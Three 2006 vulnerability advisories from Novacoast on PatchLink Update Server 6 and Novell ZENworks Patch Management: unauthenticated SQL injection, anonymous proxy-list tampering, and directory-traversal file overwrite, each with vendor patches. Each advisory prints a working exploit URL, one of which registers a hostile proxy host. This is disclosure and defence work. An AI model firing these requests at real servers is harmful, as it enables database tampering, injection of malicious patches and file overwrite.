Multiple Vulnerabilities in PatchLink Update Server 6
-------------------------------------------------------------
PatchLink Update Server 6 SQL Injection
-------------------------------------------------------------
Severity: Critical
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)
-------------------------------------------------------------
Synopsis
=====
Novacoast has discovered a vulnerability in the PatchLink Update
Server
(PLUS). This could allow the attacker to execute sql statements in the
PatchLink database as DBO.
Background
======
PatchLink Update* is the core product of the leading patch and
vulnerability
management solution for medium and large enterprise networks.
Discussion
======
There is an SQL injection vulnerability in the checkprofile.asp script.
This
unauthenticated script uses posted variables in an SQL call, which can
be
exploited.
An unchecked, posted variable (agentid) is used to create an SQL
statement.
The statement is run as “PLUS ANONYMOUS” (who is a member of PLUS
ADMINS, and
the PLUS ADMINS group is dbo on the PLUS database) was the inserting
user.
Thus the database can be manipulated as DBO via this attack.
Affected Version
=========
PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
Novell ZENworks Patch Management 6.2. SR1
Exploit
====
None required.
The example exploit given here will write the string “something”
into the
ReportErrors table:
http://plus.company.org/dagent/checkprofile.asp?agentid=11111';%20INSERT
%20INTO%20ReportErrors%20(ReportError_Description)%20VALUES%20
('something')--
Recommended Solution
=============
Apply Vendor Patch
PatchLink:
PatchLink Update Server (PLUS) for 6.2 SR1 P1
PatchLink Update Server (PLUS) for 6.1 P1
Novell:
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm
Disclaimer
======
Novacoast accepts no liability or responsibility for the
content of this report, or for the consequences of any
actions taken on the basis of the information provided
within. Dissemination of this information is granted
provided it is presented in its entirety. Modifications
may not be made without the explicit permission of
Novacoast.
-------------------------------------------------------------
PatchLink Update Server 6 PDP Anonymous Access
-------------------------------------------------------------
Severity: Medium
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)
-------------------------------------------------------------
Synopsis
=====
Novacoast has discovered a vulnerability in the PatchLink Update
Server
(PLUS) Distribution Point Server Listing for PatchLink's FastPatch
application. Exploitation of this vulnerability could allow the
attacker to
proxy requests by PatchLink Update Agents for patches, and thus
possibly
inject arbitrary packages into the PatchLink environment.
Background
======
PatchLink Update* is the core product of the leading patch and
vulnerability
management solution for medium and large enterprise networks.
PatchLink Distribution Point and FastPatch technology provide
intelligent
distribution across the entire enterprise minimizing deployment speeds
and
bandwidth utilization across the wide area network.
Discussion
======
The asp page “proxyreg.asp” does not properly authenticate
credentials when
accessed. The “proxyreg.asp” page appears to be used by the
PatchLink
FastPatch software, which allows roaming PatchLink agents to identify
proxy
servers on their network and connect to the closest or fastest
PatchLink
Distribution Point (PDP) automatically. The asp page returns a list of
PDP
servers in the organizations environment. An unauthenticated user can
list,
add, and remove PDP servers from this list.
This vulnerability would only affect organizations that use the
FastPatch
add-on product. Organizations that use SSL to protect their
agent-to-PLUS
communication will be unaffected by this attack.
Affected Version
=========
PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
Novell ZENworks Patch Management 6.2. SR1
Exploit
====
None required.
1) To list all Proxy servers use:
http://plus.company.org/dagent/proxyreg.asp?List=
Use username/password of null/null for authentication.
2) To add a new Proxy server, use:
http://plus.company.org/dagent/proxyreg.asp?Proxy=www.hostileproxy.com:1337
3) To delete a Proxy server, use:
http://plus.company.org/dagent/proxyreg.asp?Delete=pdp1.company.org
Recommended Solution
=============
1) Apply Vendor Patch
PatchLink:
PatchLink Update Server (PLUS) for 6.2 SR1 P1
PatchLink Update Server (PLUS) for 6.1 P1
Novell:
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm
2) Workaround
Deploy SSL certificate authentication to secure traffic between
agents
and PLUS.
Disclaimer
======
Novacoast accepts no liability or responsibility for the
content of this report, or for the consequences of any
actions taken on the basis of the information provided
within. Dissemination of this information is granted
provided it is presented in its entirety. Modifications
may not be made without the explicit permission of
Novacoast.
-------------------------------------------------------------
PatchLink Update Server 6 File Overwrite
-------------------------------------------------------------
Severity: Medium
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)
-------------------------------------------------------------
Synopsis
=====
Novacoast has discovered a vulnerability in the PatchLink Update
Server
(PLUS). This could allow the attacker to write or overwrite files on
the
PLUS filesystem.
Background
======
PatchLink Update* is the core product of the leading patch and
vulnerability
management solution for medium and large enterprise networks.
Discussion
======
The application “nwupload.asp” allows unauthenticated connections,
and
performs file writes for the requester as the user “PLUS ANONYMOUS”
(who is
a member of "PLUS ADMINS" Windows group by default). No validation
checks
are performed to prevent directory traversal.
The application nwupload.asp writes a file into directories defined by
variables passed to the page, appended to a registry key value. By
default,
on a Windows 2003 server, the registry key points to:
“C:\Program Files\Patchlink\Update Server\Storage”. Since
directory
traversals are not checked for, it is possible to write to any folder
on the
PLUS that PLUS ANONYMOUS (or thus, the PLUS ADMINS group) has access
to.
Affected Version
=========
PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
Novell ZENworks Patch Management 6.2. SR1
Exploit
====
None required.
1) An attacker can run:
http://plus.company.org/dagent/nwupload.asp?action=one&agentid=two&data=
thisiscool&index=1
This will first delete the folder at:
{regkey for storage directory}\one\two
then create the directory:
{regkey for storage directory}\one\two
then write the file:
{regkey for storage directory}\one\two\1.txt
The file 1.txt will have the contents of the "data" variable.
Recommended Solution
=============
Apply Vendor Patch
PatchLink:
PatchLink Update Server (PLUS) for 6.2 SR1 P1
PatchLink Update Server (PLUS) for 6.1 P1
Novell:
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm
Disclaimer
======
Novacoast accepts no liability or responsibility for the
content of this report, or for the consequences of any
actions taken on the basis of the information provided
within. Dissemination of this information is granted
provided it is presented in its entirety. Modifications
may not be made without the explicit permission of
Novacoast.